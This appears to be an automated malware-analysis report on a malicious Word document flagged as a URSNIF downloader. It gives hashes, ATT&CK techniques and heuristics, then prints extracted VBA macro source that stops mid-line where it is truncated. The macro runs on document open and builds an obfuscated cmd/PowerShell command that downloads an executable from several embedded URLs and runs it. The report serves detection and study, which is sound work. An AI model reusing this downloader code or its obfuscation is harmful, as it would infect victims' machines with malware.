Office (OLE) malware analysis — malicious · 231c412be7cf4ef3

MALICIOUS

Office (OLE)

62.8 KB Created: 2018-09-05 22:00:00 Authoring application: Microsoft Office Word First seen: 2019-01-25

MD5: 7625f264d82bb5875333bd0e584fdd47 SHA-1: 07074fe1d6d247797ab3e112699a9cee8d29588a SHA-256: 231c412be7cf4ef34d165dba23deb73d5851cb47b194997ce8ed3666ea64c7fd

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with a Document_Open subroutine that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader. The reconstructed command string suggests a complex obfuscation technique for executing a payload.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4615 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4615 bytes
SHA-256: `bebfff8e42df85e78fd9de54cf7df26b4f1d48cebb79bf1f881b5e46d0aff859`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ENBikDSwqAIpL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "62117096" + "pkMLuXDwaiW" + "143630474" + "3818" Hour "163357007" + "PHp" Hour "dzCRhqpHXzYu" + "2443" VBA.Shell CleanString(ZEV) + ABjdUJpVSQP + OwhfdDvvEnfYXv + dKBzNls + SrFzurItYN + QCCGvtlD + CWZFmiLkH, 47 - 47 Hour "tbRvhwOEFwNLKC" + "205772364" + "NIz" + "LiTNAY" Hour "OD" + "8368" Hour "3531" + "2489" Hour "AwNm" + "WNWbkLOzXzG" End Sub Attribute VB_Name = "CnmwTZORWL" Function dKBzNls() On _ Error _ Resume _ Next Hour "z" + "8209" Hour "7257" + "l" + "dBUBVu" + "cJP" kBfURIbDuiv = "cmd /V/" + "C" + Chr(0 + 2 + 4 + 5 + 23) + "^s^e" + "^t" + " A^" + "m^h" + "z=^ " + " ^ ^ " + "^ ^" Hour "5674" + "255742015" + "znHtIRL" + "49802393" HpPjbRv = " ^" + " ^ ^ " + " ^ ^ ^" + " }" + "}^{hct" + "^" + "ac^}^;" + "k" + "^a" + "er^b;^" Hour "D" + "EUwPNvzOB" + "kS" + "vmwdKtrCiimzEK" Hour "8188" + "SBzRE" YKKjnO = "P" + "r" + "^" + "w$ m^et" + "I^-^e" + "k^o" + "vn^I^;)" + "Prw" + "^$" + "^" + " ^" Hour "272497039" + "Lu" Hour "422387696" + "NvTM" + "305024346" + "lrDo" Hour "5017691" + "iMX" Hour "9901" + "KRJl" QowWqwGoot = ",^hXO^$" + "(^el" + "^i^F^" + "d^" + "a" + "^o^lnw^" + "oD^.^" + "YsX" + "^$^{yr" Hour "HnBriNI" + "OZi" AhGwdpwF = "t" + "^{)K^" + "X" + "^I$^ " + "n" + "^i^ ^" + "h" + "XO^" + "$(^hc^" + "a^ero" + "f;'" + "e" Hour "rCTW" + "6080" Hour "jJIz" + "O" + "519555364" + "jnFKqjfwm" Hour "HCkPnEiRDHDljm" + "CbIAnKaoY" + "w" + "nddTcq" XwGzuPjFYq = "^xe^.'" + "^+VE" + "i$" + "+^'\^" + "'+ci^l^" + "b" + "up:vne^" + "$^=^Prw" + "$;'^" + "18'^ =^" + " VE" + "i$^;)" + "'^@'" Hour "6203182" + "KnjCYXK" Hour "o" + "2459" + "uoh" + "952" SYiUdH = "(t^" + "i^" + "lp" + "^" + "S.'^Q^" + "x^" + "x" + "OS^m/^" + "ssc" + "/n^im^" + "da-p" Hour "PA" + "wXJdwZfq" + "sSdqDfhTwkzFHY" + "238251743" Hour "qXv" + "401" Hour "nauAmoA" + "mw" Hour "jwBp" + "295698362" vJcaqkjX = "^" + "w/^m" + "oc^.^g" + "n" + "ic" + "ru^o^" + "sc^i^" + "mar^" + "ecna^i" + "d" + "n^" + "i//:^pt" dKBzNls = kBfURIbDuiv + HpPjbRv + YKKjnO + QowWqwGoot + AhGwdpwF + XwGzuPjFYq + SYiUdH + vJcaqkjX Hour "NURTN" + "5831" + "szIj" + "HULK" End Function Function SrFzurItYN() On _ Error _ Resume _ Next Hour "5714" + "207433000" + "3249" + "GZi" GvdEGic = "t^h^" + "@VW/^" + "mo" + "c^.^s^" + "a^e^s^" + "-iiv" Hour "4259" + "zYHPddBbbAQV" Hour "TBGk" + "VKQQ" zAzUUYv = "//^" + ":" + "pt" + "t^h^" + "@" + "^896/n" + "^i^x" + ".nafa//" + ":p" + "t" + "t^h^" + "@c" Hour "ii" + "jTvoRuv" Hour "713" + "uaOrmLhb" + "pJ" + "415967860" RkFTd = "^w" + "^3l" + "^Pg1w/" + "moc.c" + "^mdt" + "c^a" + "^p^" + "moc//:p" Hour "KRjj" + "9186" ijlPJtWiN = "tt^h^" + "@^ZS^j" + "^FN" + "t6D/^e" + "ni^lno." + "^tr" + "^" + "h^" + "a^w^a^" + "d//" + "^:p^" + "tth" Hour "7600" + "irdOMmnkzOha" + "6854" + "241909826" Hour "hLilvHKwFq" + "G" Hour "48559055" + "liaMkOEn" Hour "KYs" + "Q" JdojCutnYzR = "^'=" + "^KX" + "I" + "$;^tn" + "e^" + "ilCbe" + "^W^" + "." + "t^eN" + " tc" Hour "zKiM" + "3389" Hour "144153382" + "pjz" zVqKaPSsH = "e^j^" + "bo-^" + "w" + "en^=" + "^Y^sX^" + "$^ ^l^l" + "e^" Hour "8074" + "4181" Hour "491376115" + "ipuThuCjzPL" Hour "710" + "3983" + "BLVC" + "QHzfvdR" Hour "sYfU" + "447767165" + "NzjMEmClW" + "VaMLIk" qEwpLOsIv = "h^sr^e" + "w" + "op&&f^" + "or /" + "^L %^X " + "^in (3" + "6^6^," + "^-^1,^" Hour "qli" + "9613" RjzXKjO = "0)d^" + "o ^s^" + "et ^Ua" + "^Q=!^" + "Ua" + "^Q" + "!!A^m^h" + "z:~%" + "^" + "X,1!&&i" + "^f %^X " + "^l" Hour "4542" + "kNWbCZCET" + "9873" + "DIkB" Hour "4690" + "aDSokad" + "I" + "374218089" Hour "6637" + "504305221" Hour "1484" + "u" + "pJX" + "1000" vBnCFNaR = "s^" + "s ^1" + " c^a^l^" + "l" + " % ... (truncated)

SHA-256: bebfff8e42df85e78fd9de54cf7df26b4f1d48cebb79bf1f881b5e46d0aff859

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ENBikDSwqAIpL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "62117096" + "pkMLuXDwaiW" + "143630474" + "3818"
   Hour "163357007" + "PHp"
   Hour "dzCRhqpHXzYu" + "2443"
VBA.Shell CleanString(ZEV) + ABjdUJpVSQP + OwhfdDvvEnfYXv + dKBzNls + SrFzurItYN + QCCGvtlD + CWZFmiLkH, 47 - 47
   Hour "tbRvhwOEFwNLKC" + "205772364" + "NIz" + "LiTNAY"
   Hour "OD" + "8368"
   Hour "3531" + "2489"
   Hour "AwNm" + "WNWbkLOzXzG"
End Sub



Attribute VB_Name = "CnmwTZORWL"
Function dKBzNls()

On _
Error _
Resume _
Next
Hour "z" + "8209"
   Hour "7257" + "l" + "dBUBVu" + "cJP"
kBfURIbDuiv = "cmd /V/" + "C" + Chr(0 + 2 + 4 + 5 + 23) + "^s^e" + "^t" + " A^" + "m^h" + "z=^ " + " ^  ^ " + "^   ^"
Hour "5674" + "255742015" + "znHtIRL" + "49802393"
HpPjbRv = "  ^" + " ^ ^ " + " ^ ^ ^" + " }" + "}^{hct" + "^" + "ac^}^;" + "k" + "^a" + "er^b;^"
Hour "D" + "EUwPNvzOB" + "kS" + "vmwdKtrCiimzEK"
   Hour "8188" + "SBzRE"
YKKjnO = "P" + "r" + "^" + "w$ m^et" + "I^-^e" + "k^o" + "vn^I^;)" + "Prw" + "^$" + "^" + " ^"
Hour "272497039" + "Lu"
   Hour "422387696" + "NvTM" + "305024346" + "lrDo"
   Hour "5017691" + "iMX"
   Hour "9901" + "KRJl"
QowWqwGoot = ",^hXO^$" + "(^el" + "^i^F^" + "d^" + "a" + "^o^lnw^" + "oD^.^" + "YsX" + "^$^{yr"
Hour "HnBriNI" + "OZi"
AhGwdpwF = "t" + "^{)K^" + "X" + "^I$^ " + "n" + "^i^ ^" + "h" + "XO^" + "$(^hc^" + "a^ero" + "f;'" + "e"
Hour "rCTW" + "6080"
   Hour "jJIz" + "O" + "519555364" + "jnFKqjfwm"
   Hour "HCkPnEiRDHDljm" + "CbIAnKaoY" + "w" + "nddTcq"
XwGzuPjFYq = "^xe^.'" + "^+VE" + "i$" + "+^'\^" + "'+ci^l^" + "b" + "up:vne^" + "$^=^Prw" + "$;'^" + "18'^ =^" + " VE" + "i$^;)" + "'^@'"
Hour "6203182" + "KnjCYXK"
   Hour "o" + "2459" + "uoh" + "952"
SYiUdH = "(t^" + "i^" + "lp" + "^" + "S.'^Q^" + "x^" + "x" + "OS^m/^" + "ssc" + "/n^im^" + "da-p"
Hour "PA" + "wXJdwZfq" + "sSdqDfhTwkzFHY" + "238251743"
   Hour "qXv" + "401"
   Hour "nauAmoA" + "mw"
   Hour "jwBp" + "295698362"
vJcaqkjX = "^" + "w/^m" + "oc^.^g" + "n" + "ic" + "ru^o^" + "sc^i^" + "mar^" + "ecna^i" + "d" + "n^" + "i//:^pt"
dKBzNls = kBfURIbDuiv + HpPjbRv + YKKjnO + QowWqwGoot + AhGwdpwF + XwGzuPjFYq + SYiUdH + vJcaqkjX
   Hour "NURTN" + "5831" + "szIj" + "HULK"
End Function
Function SrFzurItYN()

On _
Error _
Resume _
Next
Hour "5714" + "207433000" + "3249" + "GZi"
GvdEGic = "t^h^" + "@VW/^" + "mo" + "c^.^s^" + "a^e^s^" + "-iiv"
Hour "4259" + "zYHPddBbbAQV"
   Hour "TBGk" + "VKQQ"
zAzUUYv = "//^" + ":" + "pt" + "t^h^" + "@" + "^896/n" + "^i^x" + ".nafa//" + ":p" + "t" + "t^h^" + "@c"
Hour "ii" + "jTvoRuv"
   Hour "713" + "uaOrmLhb" + "pJ" + "415967860"
RkFTd = "^w" + "^3l" + "^Pg1w/" + "moc.c" + "^mdt" + "c^a" + "^p^" + "moc//:p"
Hour "KRjj" + "9186"
ijlPJtWiN = "tt^h^" + "@^ZS^j" + "^FN" + "t6D/^e" + "ni^lno." + "^tr" + "^" + "h^" + "a^w^a^" + "d//" + "^:p^" + "tth"
Hour "7600" + "irdOMmnkzOha" + "6854" + "241909826"
   Hour "hLilvHKwFq" + "G"
   Hour "48559055" + "liaMkOEn"
   Hour "KYs" + "Q"
JdojCutnYzR = "^'=" + "^KX" + "I" + "$;^tn" + "e^" + "ilCbe" + "^W^" + "." + "t^eN" + " tc"
Hour "zKiM" + "3389"
   Hour "144153382" + "pjz"
zVqKaPSsH = "e^j^" + "bo-^" + "w" + "en^=" + "^Y^sX^" + "$^ ^l^l" + "e^"
Hour "8074" + "4181"
   Hour "491376115" + "ipuThuCjzPL"
   Hour "710" + "3983" + "BLVC" + "QHzfvdR"
   Hour "sYfU" + "447767165" + "NzjMEmClW" + "VaMLIk"
qEwpLOsIv = "h^sr^e" + "w" + "op&&f^" + "or /" + "^L %^X " + "^in (3" + "6^6^," + "^-^1,^"
Hour "qli" + "9613"
RjzXKjO = "0)d^" + "o ^s^" + "et ^Ua" + "^Q=!^" + "Ua" + "^Q" + "!!A^m^h" + "z:~%" + "^" + "X,1!&&i" + "^f %^X " + "^l"
Hour "4542" + "kNWbCZCET" + "9873" + "DIkB"
   Hour "4690" + "aDSokad" + "I" + "374218089"
   Hour "6637" + "504305221"
   Hour "1484" + "u" + "pJX" + "1000"
vBnCFNaR = "s^" + "s ^1" + " c^a^l^" + "l" + " %
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.